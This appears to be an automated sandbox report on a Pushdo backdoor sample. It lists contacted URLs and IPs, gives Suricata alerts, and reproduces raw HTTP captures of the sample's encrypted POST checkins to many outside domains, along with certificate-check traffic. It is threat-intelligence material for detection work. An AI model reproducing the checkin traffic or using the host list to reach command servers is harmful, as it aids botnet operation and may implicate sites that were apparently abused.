hxxp://g2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR6EHhJ4XUaQA4N26wwyKpLEnXRrAQULNVQQZcVi/CPNmFbSvtr2ZnJM5ICEG6KkOvP8ESKcg0IBdCCpUQ= 23.46.123.27
hxxp://www.sztartufi.com/
hxxp://www.msasys.com/
hxxp://ocsp.int-x3.letsencrypt.org//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgM8VK+L+sAJyPXN62OPRwOgbA==
hxxp://www.solutioncorp.com/
hxxp://apps.identrust.com/roots/dstrootcax3.p7c
hxxp://ocsp.godaddy.com//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDH18gSiIK8Jg== 50.63.243.230
hxxp://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrJdiQ/icg9B19asFe73bPYs+reAQUdXGnGUgZvJ2d6kFH35TESHeZ03kCEFslzmkHxCZVZtM5DJmpVK0= 178.255.83.1
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://ocsp.int-x3.letsencrypt.org//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgPbE+K+a6P2SuOky80Zou2a1g==
hxxp://www.theprintinghouseltd.co.uk/
hxxp://ocsp.godaddy.com//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc= 50.63.243.230
hxxp://structives.org/ 64.98.145.30
hxxp://ocsp.globalsign.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8D4g 104.16.26.216
hxxp://ocsp.int-x3.letsencrypt.org//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgMpdqqzEgO0NFh6jhwxp60Osw==
hxxp://ocsp.int-x3.letsencrypt.org//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgMJRuTyDL2SSO5n1lQa6eyAQw==
hxxp://churchclothes.com/
hxxp://www.itgsolutions.nl/
hxxp://www.dbcomponents.com/
hxxp://www.shbrazil.com/
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt
hxxp://www.meubles-jacquelin.com/
hxxp://itgsolutions.nl/
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc=
hxxp://crl.godaddy.com/gdig2s1-87.crl 50.63.243.228
hxxp://www.taykon.com/
hxxp://www.racknstackwarehouse.com.au/
hxxp://hd.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQVTU55zB7YBNhaYi1WtGCOIGzJNQQUyqxd4ZAv8e+M1J81AeEBO6DOwXcCEH/F5wATxsli1UI2IKNKtL8=
hxxp://www.kagu-hokuren.com/
hxxp://www.austriansurfing.at/
hxxp://www.istanbultarim.com.tr/
hxxp://www.upsilon89.com/wp/ 213.186.33.16
hxxp://www.shipeliteexpress.com/ 173.61.225.180
hxxp://ocsp.int-x3.letsencrypt.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgP9tcSTUD5w2OMP5jJLv/9/qQ==
hxxp://s.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/YHKj6JjF6UBieQioTYpFsuEriQQUtnf6aUhHn1MS1cLqBzJ2B9GXBxkCEBh39mVop4K7qftC2uROM9c=
hxxp://buzzkillmedia.com/
hxxp://www.cksglobal.net/
hxxp://ocsp.trust-provider.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEENSAj/6qJAfE5/j9OXBRE4=
hxxp://www.acicinvestor.ca/
hxxp://tj.symcb.com/tj.crt
hxxp://www.naijagurus.com/
hxxp://tj.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRvdluGAc/lYx1bXFBnllP1ugYHmAQUwk9IV/zRT5rAXTh9DgXb2S61UmACEBcIefF38d2vUUuu7Wj4bZs=
hxxp://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== 50.63.243.230
hxxp://cdp1.public-trust.com/CRL/Omniroot2025.crl
hxxp://www.cbsprinting.com.au/
hxxp://www.perc.ca/ 69.89.31.118
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI=
hxxp://crl.comodoca.com/cPanelIncCertificationAuthority.crl
hxxp://sortedorganizing.com/
hxxp://www.sztartufi.com/en/
hxxp://www.denville.ca/
hxxp://mscrl.microsoft.com/pki/mscorp/crl/MSIT Machine Auth CA 2(1).crl
hxxp://ocsp.int-x3.letsencrypt.org//MFMwUTBPME0wSzAJBgUrDgMCGgUABBR+5mrncpqz/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7/Oo7KECEgP0moYiJ98Ac0H22dRrLwXjjg==
hxxp://www.topex.ro/ 89.35.6.153
hxxp://www.combine.or.id/
hxxp://www.photoclubs.com/ 209.50.251.101
www.bocr.cz 217.198.113.104
bethisraelcenter.org 204.213.246.21
mail57.us2.mcsv.net 173.231.139.57
www.iktus.fr 52.16.230.8


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Backdoor.Win32.Pushdo.s Checkin
ET TROJAN Possible Compromised Host Sinkhole Cookie Value Snkz

Traffic

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bigjohnsbeefjerky.com
Connection: Keep-Alive
Cache-Control: no-cache

KuBcgc6Bt3cdL 2cWZ6WGzHgKinO52uA4h5oqJr/n1SbvZpBDhY4PIwbyBQN7J7CXOPywKzC8Kd9bI0CFzoGZk /bVQvz7mYA3aN9szFfR1PqPGXW7Byec93idJf8fAbYG586jFrIBiTB4LUPNSjN682 GggeOp5op/32IMdKn1iVmUofHfVvSSG31cVHZ6ky5bCIqDhS7Yjl4OacisD/VIBk1OhymD5/bdfd/1bpxxpFBByZ ORoGy2T6SzddXQbvSs8rGyDbJz6A3st0RJuGAvEnV1Qnt2z4srkHeZ1TMHuKR9cg5t7B2DSKL4qSCgFdIAyW10KNq1aceU7sgW27W0zhfpnIxpr4tw65iP1PrlSUoVAL WDXzmRGUNERdT7HwF36SFr/0WeVQ3z2qIrUZvT1KdniyO5YfWKogPlIGaboPR/1j89AyXkxZ 7LGnTl9eb7d 2zzVppKRhVIIYSMvlwOk5xF63LFNvn9i8yUGBaSptZbF0mpReH8BJ9y9
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:17:08 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXps://bigjohnsbeefjerky.com/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Sucuri-ID: 15010
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
Moved Permanently..Server: nginx..Date: Sat, 01 Jul 2017 11:17:08 GMT
..Content-Type: text/html..Content-Length: 178..Connection: keep-alive
..Location: hXXps://bigjohnsbeefjerky.com/..X-XSS-Protection: 1; mode=
block..X-Frame-Options: SAMEORIGIN..X-Content-Type-Options: nosniff..S
trict-Transport-Security: max-age=31536000; includeSubdomains; preload
..X-Sucuri-ID: 15010..<html>..<head><title>301 Moved
Permanently</title></head>..<body bgcolor="white">.
.<center><h1>301 Moved Permanently</h1></center&g
t;..<hr><center>nginx</center>..</body>..</
html>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 432
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: iktus.fr
Connection: Keep-Alive
Cache-Control: no-cache

4YEHboIL F5yWmz dVRPAwV4ok S1bDu1oFMSmk3i3KGl3 ALsJTTZFvPU2vs47mENNAHh2B5UuRsdFNIjwybU/irVkuG6 elvaOawMXXAPQOQLTw4G2zONATb9/zaOHsyO0n8qKZRdFAu8SSsl8RZIIGqN3FP5tsYWxRyi9uKBkBgq4uZtEBDh7ZNYbY9wA0jFQKw9Z8gWNcV97FmJ7OpIUC2ymiFg8wPS6Ks6Yx0SnJ8TpTe43l2gQmhdXL2cw/mSQblKXzXRrUtc4DPbP9q0qotnAavNLBpNjwgO1UaWBgTeYyaP5 X DlF0dzQXQDMaCA0uofc0PO92IdwkcU1iQSxJ2rYN9 J5QDjKdCFNmmFPVy92AmdpGdXcoAgzIgXLAIA9Q1ot PseUmimlNdX7gKnFeb433mHXuR0CjkXjyD2X
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sat, 01 Jul 2017 11:16:39 GMT
Location: hXXps://VVV.iktus.fr/
Server: nginx
X-Jimdo-Instance: i-0b632649c973d6d75
X-Jimdo-Wid: scbbf896b88d10554
Content-Length: 0
Connection: keep-alive
HTTP/1.1 301 Moved Permanently..Cache-Control: no-cache, no-store, mus
t-revalidate..Content-Type: text/html; charset=UTF-8..Date: Sat, 01 Ju
l 2017 11:16:39 GMT..Location: hXXps://VVV.iktus.fr/..Server: nginx..X
-Jimdo-Instance: i-0b632649c973d6d75..X-Jimdo-Wid: scbbf896b88d10554..
Content-Length: 0..Connection: keep-alive..


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQVTU55zB7YBNhaYi1WtGCOIGzJNQQUyqxd4ZAv8e+M1J81AeEBO6DOwXcCEH/F5wATxsli1UI2IKNKtL8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: hd.symcd.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Sat, 01 Jul 2017 11:17:30 GMT
Content-Type: application/ocsp-response
Content-Length: 1617
Connection: keep-alive
content-transfer-encoding: binary
cache-control: max-age=495039, public, no-transform, must-revalidate
last-modified: Fri, 30 Jun 2017 04:48:09 GMT
expires: Fri, 7 Jul 2017 04:48:09 GMT
0..M......F0..B.. .....0.....30../0.........Y......-.X......9..2017063
0044809Z0s0q0I0... .........MNy.....Zb-V.`. l.5....]../.....5...;...w.
........b.B6 .J......20170630044809Z....20170707044809Z0...*.H........
.......\|>d.P.....u.{*J<..8.c.i.b....k..........`p.[ov.|t&.a..,.
.S..>. .e...M?C.h.`.S.L%..0..*ygc....s..a#..._|0g...w.....Qx.,.~Exb
.>.D......7Q.W...V..O..r<.*.a.i......b4...9yJ...:.Pc.......3.*./
......B.....N.$z.v....Qbz.Ci.Po.B.s.~7....Op...$.i/.vGe...}...`..W...v
0..r0..n0..V..........|.b..DR.}.Q..0...*.H........0..1.0...U....US1.0.
..U....Symantec Corporation1.0...U....Symantec Trust Network1.0...U...
.Domain Validated SSL1&0$..U....Symantec Basic DV SSL CA - G20...17060
3000000Z..170901235959Z071503..U...,Symantec Basic DV SSL CA - G2 OCSP
Responder0.."0...*.H.............0.........k#G..P...x..E.8.h.|...?a.-
$F..C...I. .,A...H:c......#.d*../x..^A6.....H*..M....=....Q..{.}6..q..
Z...Ijq.6......."u..J.u`.]...cX........<...f^..1`(..`.0....G...^b.$
..b.AQ.O.........=QY.b4'.M...}...R........Z..u.d...[U/.....j.(2(u.Y.E.
....V.hbQG.q.......R1..........0...0... .....0......0"..U....0...0.1.0
...U....TGV-E-15050...U.#..0.....]../.....5...;...w0...U.........Y....
..-.X......90...U.......0.0...U.%..0... .......0...U...........0h..U.
.a0_0]..`.H...E....0N0#.. .........hXXps://d.symcb.com/cps0'.. .......
0... hXXps://d.symcb.com/rpa0...*.H................1x.Z.s ....../..x.
.S.B)....V...._J......7..u..pP.....uL.c;...B...i.`..%H@........;/p..8.
?.6H,.k...^....B`C.jtaa.m..Jtdhu ...s\HV.OE...................S..k

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: arquiteturadigital.com
Connection: Keep-Alive
Cache-Control: no-cache

O/YZuDu0SGGE7i/o0pyyviRa/FpBQ/sBnwGronZE1N3tEdVSwqjL0Smd0XukM48NocmCzWlnC7yq9Vs3J3VAH8f95ueXnA3XVDYBfLt26J/qXxZoguiihmmplXw02iv/Ut7dESSyjdKbX57E0WIFYAd2kvpBPolgt6YQPXq7MpLUXhn D4qMW4cSjsw4ELGwlUvpfUtZD9oKfewt4ejnWoyOmuWOs/8ZZUg5KN8o mqVIURPxbwV7jktaA262xWZ1VE71SCiUSFBzDmvfvemJopYlckY3CeEjpBgZEVQAqMA8kPnmnC5rK74kwC1VMUZDNWfY1AAOnYnYCKtGGK5aU64KkWnAIAuXTm8fuBVo7Ej3dVmexfP8t0N5D8jZ4tmzqsV2XOacFjVkDiZeiso XWoNbMvrAqpyzqABdSRdiydMQr5wq8vKwxaRd21LIl1wUPeqHNQFAJV/a3s9WQf
HTTP/1.1 418 unused
Date: Sat, 01 Jul 2017 11:16:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 522
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>418 unused</title>.</head><bod
y>.<h1>unused</h1>.<p>The server encountered an i
nternal error or.misconfiguration and was unable to complete.your requ
est.</p>.<p>Please contact the server administrator,. webm
aster@arquiteturadigital.com and inform them of the time the error occ
urred,.and anything you might have done that may have.caused the error
.</p>.<p>More information about this error may be availabl
e.in the server error log.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 440
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: goodvaluecenter.com
Connection: Keep-Alive
Cache-Control: no-cache

o0WpR6t05F0pyLXaggI4bBSgdj9x5BaODxF4Jo2yEj4bCunrMW1wnZ 8JF3s7GEljNLu cwDX/ntlpkxVQNIsNesmAPVpSFISdDfMAxIAoaeUqlCJd8YD77wNYZCH31u6tNScd BnxTzFFSt46VCQPHwUGftlKySKvv FQOC bQJUEePYWf9Qlb LYAcgg2dWJSlz6ppdgx6vJY8cm1Iq/4XbLPuAdKjhNk r7yyUon7VXRMIrcYWGLW5MN12oRImbqT0icEEX4zsC9qdeKAQqlPaZotWp70DIPvDZIqsRJ1lNJyav25QtIrTad51 NlPKy5nlig34CBZo/m83vf4boTCd7Wvp3b1EAQEps1fHzHwlH7HWrjboSAHslPTy4LAfRWBUxop/5Pkq8x/QcdMNb56XvU6wHQPVnKUM9m7VGgnMikz1c8bQ==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d13d17b00dca6023587473b3266d777511498907798; expires=Sun, 01-Jul-18 11:16:38 GMT; path=/; domain=.goodvaluecenter.com; HttpOnly
Cache-Control: max-age=2
Expires: Sat, 01 Jul 2017 11:16:40 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 3778f449e1818255-KBP
159f..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no
-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
; <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&
gt;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-
US"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>
.<title>Attention Required! | Cloudflare</title>..<meta
charset="UTF-8" />.<meta http-equiv="Content-Type" content="tex
t/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" con
tent="IE=Edge,chrome=1" />.<meta name="robots" content="noindex,
nofollow" />.<meta name="viewport" content="width=device-width,
initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="c
f_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" med
ia="screen,projection" />.<!--[if lt IE 9]><link rel="styl
esheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
type="text/css" media="screen,projection" /><![endif]-->.<
style type="text/css">body{margin:0;padding:0}</style>.<!-
-[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scri
pts/jquery.min.js"></script><![endif]-->.<!--[if gte
IE 10]><!--><script type="text/javascript" src="/cdn-cgi/
scripts/zepto.min.js"></script><!--<![endif]-->.<
script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"&

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.ompgp.co.jp
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 01 Jul 2017 11:17:04 GMT
Server: nginx
Set-Cookie: _lang=en; expires=Sun, 01-Jul-2018 11:17:04 GMT; Max-Age=31536000; path=/
Set-Cookie: RCMSSESS=q994s8obj3okb4i5kkb5l56uv0; path=/; HttpOnly
Vary: Accept-Encoding,User-Agent
Vary: Accept-Encoding,User-Agent
X-Content-Type-Options: nosniff
X-FRAME-OPTIONS: sameorigin
X-Permitted-Cross-Domain-Policies: master-only
X-XSS-Protection: 1; mode=block
Content-Length: 14413
Connection: keep-alive
<!DOCTYPE html>..<html dir="ltr" lang="ja">..<head>.
.<meta charset="UTF-8">..<meta http-equiv="Content-Style-Type
" content="text/css">..<meta http-equiv="Content-Script-Type" co
ntent="text/javascript">..<meta name="viewport" content="width=1
024" >..<title>............O.M.P....OEM...ODM............<
/title>..<meta name="Keywords" content="...............,ompgp,..
.......oem,OMP,................................................,Suibar
a,OEM,ODM,...........................,........................,.......
..,......omp,.........,omp,..................,made in japan,japan qual
ity,.........,factory brand,......OM......,yuge">..<meta name="D
escription" content=".................................................
..........................OEM...ODM...................................
......................................................................
.............................................OMP......................
........Suibara...Laula Franer...YUGE.................................
.........">..<link rel="home" href="/" title="OMP COMPANY" >.
.<link rel="index" href="/sitemap/" title="OMP COMPANY Site Map" &g
t;..<link rel="alternate" media="handheld" href="/" >..<meta
property="og:title" content=" - ............O.M.P....OEM...ODM........
....">..<meta property="og:description" content="...............
............................................................OEM...ODM.
..................................................................

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: nataliecurtiss.com
Connection: Keep-Alive
Cache-Control: no-cache

IJnCV1maH4VAW29kaD86qfILHUe3Lppjnao3q7XPRVk3a9bomPyK9Y0JgfsCQLBbdHwaJgVrfwFS7em17dSjEE8RvKmtdFICxRaA2yLxFF74GS9U gfJ/r3q3wM/VYfpsF4VfbvmZafWvWQTuO9thtvIvZ5GGH8MTYL87tkCPdX/OjanW9a3UmGSz6ZxzXE5o U82sCk0rTq775G5jGsnuuwJIBm2PvegXBC3bjIepbYlrrkT2sr 6SemnCBjDFfQEiUGtS9bClm1RvNTn/2XuonEjcoFl7p6Pkm9DMocailTx sHQhJ8hxmxqXV/2S 8CetAk61SqUi3LSHFpvf 7TL7pmw4yKyPkxIx1i RTdFBk8psyAhbPELcOt5w2r19cL3QPD44LLwIMAsyqoLurz/pCRImWImymKPcbyb0gSjvEHy yu/N5KjlRJhaMkJmAEJc/hFHwFIEi5NAqW ObxN2j0NyT8BlWBe8B9Hn9ZW cLM733U
HTTP/1.1 403 Forbidden
content-length: 375
x-synthetic: true
expires: Thu, 01 Jan 1970 00:00:00 UTC
pragma: no-cache
cache-control: no-cache, must-revalidate
content-type: text/html; charset=UTF-8
connection: close
date: Sat, 01 Jul 2017 11:17:24 UTC
x-contextid: loUdmsiQ/W9zN41hf
x-via: 1.1 echo133
<html>.<head>.<title>403 Forbidden</title>.<
;style> body { background-color: #F2F2F2; color: #3E3E3E; font-fami
ly: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 12px; }
pre { word-wrap: break-word; } </style>.</head>.<body&
gt;.<h1>403 Forbidden</h1>.<p><pre>loUdmsiQ/W9
zN41hf @ Sat, 01 Jul 2017 11:17:24 GMT</pre>.<p><pre>
;BRICK-6</pre>.<p><pre></pre>.</body>.&l
t;/html>..


GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.austriansurfing.at
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:40 GMT
Server: Apache
Content-Language: de
Content-Length: 24076
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<!DOCTYPE html> <html lang="de"> <head><meta http
-equiv="x-ua-compatible" content="IE=edge"> <meta charset="utf-8
"> <!-- This website is powered by TYPO3 - inspiring people to s
hare! TYPO3 is a free open source Content Management Framework initial
ly created by Kasper Skaarhoj and licensed under GNU/GPL. TYPO3 is cop
yright 1998-2017 of Kasper Skaarhoj. Extensions are copyright of their
respective owners. Information and contribution at hXXps://typo3.org/
--> <base href="hXXp://VVV.austriansurfing.at/"> <meta na
me="generator" content="TYPO3 CMS"> <meta name="description" con
tent="Austrian Surfing - der ..sterreichische Surfverband: Surf Instru
ctor Ausbildungen & mehr in den besten Surfdestinationen Europas,
AS Championships, .."> <link rel="stylesheet" type="text/css" hr
ef="/typo3temp/assets/compressed/style-dcbe48bd1e5d2738398ec085bda930e
0.css?1498637078" media="all"> <script src="/typo3temp/assets/co
mpressed/libs-5b30ede5f80078fadb1469d2f6caf68f.js?1498637078" type="te
xt/javascript"></script> <meta name="robots" content="inde
x, follow"> <meta content="width=device-width, initial-scale=1.0
" name="viewport"> <link rel="apple-touch-icon" sizes="180x180"
href="/fileadmin/assets/icons/apple-touch-icon.png"> <link rel="
icon" type="image/png" href="/fileadmin/assets/icons/favicon-32x32.png
" sizes="32x32"> <link rel="icon" type="image/png" href="/filead
min/assets/icons/favicon-16x16.png" sizes="16x16"> <link rel

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 476
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: acicinvestor.ca
Connection: Keep-Alive
Cache-Control: no-cache

QLiu3Y4a0l6GyeSeGeCMW/G6nvKOn53botsOgTogEmtxAmcuQxniN7SqG4b2SDdAUPIyCQZpdYXjLFlOQgzlh 7qSmazgSoG7GhvsmxuCeCjRbqitQRqynFQ89USmcVAMwh8QcvdVvELvgMPw3npYPI JNN0fLZhJ4eX4stQ8Ayic7wzpkUKQfUCVgiwo70KuEbzvrfomebhwI UN2k rp3yfySyn7Nh9VaeLij0YhNYWKj2xz sLkyb0PjoCajTnCBL SyYzAvKko817H4P6spbzAdq4ZszOVxzsdQG2bq/eCkF4XXD3yv n7W6AKyAOcNeM4rbn05NiUp1gB0ri5dF7OoCHsycSif1LD gezqiAlAsIOetY23GBXtBVKicu/G2EDHSejjB2 aiAOjxOFEnrn4L4BpS0tbWs0Lnd5hdRuI6njJLDpyhDWNKCMk/oxNeZhfFxZ0PCcomF7ePM t6uRjw
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:16:39 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.acicinvestor.ca/
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
Moved Permanently..Server: nginx..Date: Sat, 01 Jul 2017 11:16:39 GMT
..Content-Type: text/html..Content-Length: 178..Connection: keep-alive
..Location: hXXp://VVV.acicinvestor.ca/..<html>..<head><
;title>301 Moved Permanently</title></head>..<body b
gcolor="white">..<center><h1>301 Moved Permanently</
h1></center>..<hr><center>nginx</center>..&
lt;/body>..</html>....


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRvdluGAc/lYx1bXFBnllP1ugYHmAQUwk9IV/zRT5rAXTh9DgXb2S61UmACEBcIefF38d2vUUuu7Wj4bZs= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: tj.symcd.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1413
content-transfer-encoding: binary
Cache-Control: max-age=318350, public, no-transform, must-revalidate
Last-Modified: Wed, 28 Jun 2017 03:42:50 GMT
Expires: Wed, 5 Jul 2017 03:42:50 GMT
Date: Sat, 01 Jul 2017 11:17:00 GMT
Connection: keep-alive
0.........z0..v.. .....0.....g0..c0................p,:...Y.Q ..2017062
8034250Z0s0q0I0... ........ov[....c.[\Pg.S........OHW..O..]8}......R`.
...y.w...QK..h.m.....20170628034250Z....20170705034250Z0...*.H........
.......!j..u...m"....}..}...-cO6..Z.:...-h..I8.........L1l........2h{g
.5=hc....%..7m..|...X,e....E.D......58..._.....vu...;.........n,......
Pt.,..3..<..8Q.......W?..=...AX9:........Q.|G.B.C.h.........$ _.y-.
......./O...D....Lu.#F.RW..c..v....<sF.i.......3..........0...0...0
............ e...7.......60...*.H........0A1.0...U....US1.0...U....tha
wte, Inc.1.0...U....thawte SSL CA - G20...170426000000Z..170725235959Z
0,1*0(..U...!thawte SSL CA - G2 OCSP Responder0.."0...*.H.............
0.........w........3..c.....Es..\>..b....z...J..T..y..&E%..;[.)....
.7{o.!X.`...p._....:.H{{u...... 9...ast...T..X...G.....|........?EpZ..
.....UCU.}.:K7...o..R.*../..0F..e.Q.)BVfj"....../)....E.......z.......
El........OQi.Y..........f.. ..\.._.1W#...&..u........P.H.........0..0
... .....0......0!..U....0...0.1.0...U....TGV-E-9820...U.#..0....OHW..
O..]8}......R`0...U................p,:...Y.Q 0...U.......0.0...U.%..0.
.. .......0...U...........0...*.H.............O.~....WWd.......s.Q~g..
...s..qy.......v...K...E..........B.5..R..l.u.t..'V......6..k..<'.&
.v.p...DCxrQYa.[U.........O......^...;]mY.;.}....:-....Q..q...%<.W2
=:.E]...P.....Z....w%..$M.f...v.......%.4....:..o.e..Y....g...........
1q..cs...X.-..5....M6y....&...

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEBaH1oht4jAGhSM9vxG/ZZc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: t2.symcb.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1504
content-transfer-encoding: binary
Cache-Control: max-age=417758, public, no-transform, must-revalidate
Last-Modified: Thu, 29 Jun 2017 07:19:00 GMT
Expires: Thu, 6 Jul 2017 07:19:00 GMT
Date: Sat, 01 Jul 2017 11:16:55 GMT
Connection: keep-alive
0..........0..... .....0......0...0.........@e!.t.....4...,.#..2017062
9071900Z0s0q0I0... ........0..k....&..p..^.X.....{[E....z.1..j..F.WHP.
.....m.0..#=...e.....20170629071900Z....20170706071900Z0...*.H........
.....$%..AA..pT.U.:D..r/........o....fg..R....3.........A.............
7....'1..;...~....e...Qj........h.`...v......A..O......J..q..I.q}.I..r
UN......IO.WR....E.W.?i....H..G.rP9&...Gq.....x.#.a...5.......7..}.A..
.W.J.....C.j.g....v5.B}P.....E......-.H.].8.......Y....0...0...0......
....j!.....&.....t.T0...*.H........0..1.0...U....US1.0...U....thawte,
Inc.1(0&..U....Certification Services Division1806..U.../(c) 2006 thaw
te, Inc. - For authorized use only1.0...U....thawte Primary Root CA0..
.161122000000Z..171214235959Z0_1.0...U....US1.0...U....thawte, Inc.190
7..U...0thawte Primary Root OCSP Responder Certificate 50.."0...*.H...
..........0..........s..O..W>.....2......n..z...U.......i..Ie...].O
